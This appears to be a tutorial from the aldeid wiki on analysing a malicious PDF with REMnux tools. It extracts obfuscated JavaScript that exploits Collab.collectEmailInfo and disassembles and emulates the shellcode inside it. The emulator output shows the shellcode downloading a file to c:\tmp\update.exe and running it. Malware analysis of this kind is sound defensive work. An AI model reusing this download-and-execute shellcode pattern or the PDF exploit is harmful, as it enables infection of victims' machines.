
From aldeid
Jump to navigation Jump to search


I will describe the process of analyzing a malicious PDF file.

$ file pdf3.pdf 
pdf3.pdf: PDF document, version 1.4
$ pdfinfo pdf3.pdf 
Error (45188): Illegal character '>'
Error: PDF file is damaged - attempting to reconstruct xref table...
Creator:        Scribus
Producer:       Scribus PDF Library
CreationDate:   Sat Jul 11 08:11:56 2009
ModDate:        Sat Jul 11 08:11:56 2009
Tagged:         no
Pages:          1
Encrypted:      no
Page size:      595.28 x 841.89 pts (A4)
File size:      57348 bytes
Optimized:      no
PDF version:    1.4

For our analysis, we will need:

  • The REMnux distribution (contains all below necessary tools)
  • pdfid to identify objects in our PDF file
  • pdf-parser to list JavaScript objects
  • pdfobjflow to map the relationships between the PDF objects
  • jsunpackn to extract JavaScript contained in the PDF file
  • SpiderMonkey to run and de-obfuscate the JavaScript
  • Libemu/sctest to emulate the shellcode
  • command line (to convert our shellcode to various formats)

Identify objects

List objects

Let's first identify the objects contained in the PDF file, with pdfid.

remnux@remnux:~/malware$ pdfid pdf3.pdf 
PDFiD 0.1.2 pdf3.pdf
 PDF Header: %PDF-1.4
 obj                   40
 endobj                40
 stream                25
 endstream             25
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    3
 /JavaScript            4
 /AA                    0
 /OpenAction            0
 /AcroForm              1
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0

Search for JavaScript

From the above command, we notice that our PDF file contains JavaScript. Let's list the concerned objects:

remnux@remnux:~/malware$ pdf-parser --search=JavaScript pdf3.pdf 
obj 37 0
 Referencing: 34 0 R

    /S /JavaScript
    /JS 34 0 R

obj 38 0
 Referencing: 35 0 R

    /S /JavaScript
    /JS 35 0 R

obj 39 0
 Referencing: 36 0 R

    /S /JavaScript
    /JS 36 0 R

obj 7 0
 Referencing: 40 0 R

    /JavaScript 40 0 R

Chained JavaScript objects

Let's see how these objects are linked with pdf-parser and pdfobjflow:

remnux@remnux:~/malware$ pdf-parser pdf3.pdf | pdfobjflow 
remnux@remnux:~/malware$ feh pdfobjflow.png

Here is an extract of the output:

Extract JavaScript

We could use pdf-parser to extract JavaScript code contained in the PDF file. However, as it seems to be split into 3 parts, the easiest is to use jsunpackn.

remnux@remnux:~/malware$ jsunpack-extractjs pdf3.pdf


Found JavaScript in 34 0 (44132 bytes)
	children []
	tags [["TAGVAL", "Length", "46 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
	indata = << /Length 46/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamx]Y,q+A�8jyl`U�;B~=6Q>UY|ddo�~�>?~z~
Found JavaScript in 35 0 (265 bytes)
	children []
	tags [["TAGVAL", "Length", "43 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
	indata = << /Length 43/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamxM@E_EfnAfTEr�sF+=Z:K0jvEa[2U{W%iO\-
Found JavaScript in 7 0 (0 bytes)
	children [["JavaScript", "40 0"]]
	tags [["ENDTAG", "JavaScript", "40 0 R "]]
	indata = << /JavaScript 40 0 R >>
Found JavaScript in 36 0 (214 bytes)
	children []
	tags [["TAGVAL", "Length", "62 "], ["TAGVAL", "Filter", ""], ["ENDTAG", "FlateDecode", ""]]
	indata = << /Length 62/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>streamx=@_%XuDDH"vH:njO_izi4]�0i2Rj3iShlQY
Wrote JavaScript (45564 bytes -- 953 headers / 44611 code) to file pdf3.pdf.out

Jsunpackn confirmed the presence of JavaScript and wrote an output in pdf3.pdf.out. Before we can execute the JavaScript, we must remove jsunpack headers from the output:

Execute JavaScript

Now, let's save the result in a file named pdf3.js and run it with SpiderMonkey.

remnux@remnux:~/malware$ tail -n+18 pdf3.pdf.out > pdf3.js
remnux@remnux:~/malware$ js -f /usr/local/etc/def.js -f pdf3.js > pdf3.out

Let's see how it looks like. As shown on the below screenshot, it's an exploit about Collab.collectEmailInfo:

Extract shellcode

Let's extract the shellcode contained in the array sIIxQHCE:

Now, let's remove the quotes and commas:

remnux@remnux:~/malware$ sed "s/[',]//g" temp.unicode > shellcode.unicode
remnux@remnux:~/malware$ more shellcode.unicode 

Analyze shellcode


The shellcode needs to locate itself. It does that with the CALL/POP approach:

remnux@remnux:~/malware$ cat shellcode.unicode | unicode2hex-escaped > shellcode.hex 
remnux@remnux:~/malware$ cat shellcode.hex | sed "s/\\\x//g" | rasm -a x86 -d - | head -n 20
0000 00  push eax
0000 00  push ebx ; cursor+0x3
0000 00  push ecx ; cursor+0x1
0000 00  push edx ; cursor+0x2
0000 00  push esi ; cursor+0x6
0000 00  push edi ; cursor+0x7
0000 00  push ebp ; cursor+0x5
0000 00  pushfd 
0000 00  call 0xd  ; 1 = 0x0000000d
0000 00  pop ebp
0000 00  sub ebp, 0xd
0000 00  xor eax, eax
0000 00  add eax, [fs:eax+0x30]
0000 00  js 0x25  ; 2 = 0x00000025
0000 00  mov eax, [eax+0xc]
0000 00  mov esi, [eax+0x1c]
0000 00  lodsd 
0000 00  mov eax, [eax+0x8]
0000 00  jmp 0x2e  ; 3 = 0x0000002e
0000 00  mov eax, [eax+0x34]

Emulate shellcode with libemu

Let's analyze the shellcode with libemu sctest. We first need to convert our shellcode to raw format:

remnux@remnux:~/malware$ cat shellcode.unicode | unicode2raw > shellcode.raw

Now we can use sctest:

remnux@remnux:~/malware$ cat shellcode.raw | sctest -Svs 10000000 > sctest-out.txt
remnux@remnux:~/malware$ more sctest-out.txt 
verbose = 1
cpu error error accessing 0x00000004 not mapped

stepcount 32150
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x0041715e => 
           = "c:\tmp\";
) =  7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417245 => 
           = "URLMON.DLL";
) = 0x7df20000;
     HMODULE hModule = 0x7df20000 => 
     LPCSTR lpProcName = 0x00417250 => 
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 => 
     LPCTSTR szURL = 0x00417278 => 
           = "";
     LPCTSTR szFileName = 0x0041715e => 
           = "c:\tmp\update.exe";
     DWORD dwReserved = 0;
) =  0;
     LPCSTR lpCmdLine = 0x0041715e => 
           = "c:\tmp\update.exe";
     UINT uCmdShow = 5;
) =  32;
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x0041715e => 
           = "c:\tmp\";
) =  7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417245 => 
           = "URLMON.DLL";
) = 0x7df20000;
     HMODULE hModule = 0x7df20000 => 

A temporary path (C:\tmp\) is first defined to store the future downloaded file. URLMON.DLL is then loaded and will be used by the URLDownloadToFileA function to download a file from the Internet ( The downloaded file is saved to c:\tmp\update.exe and executed by WinExec.
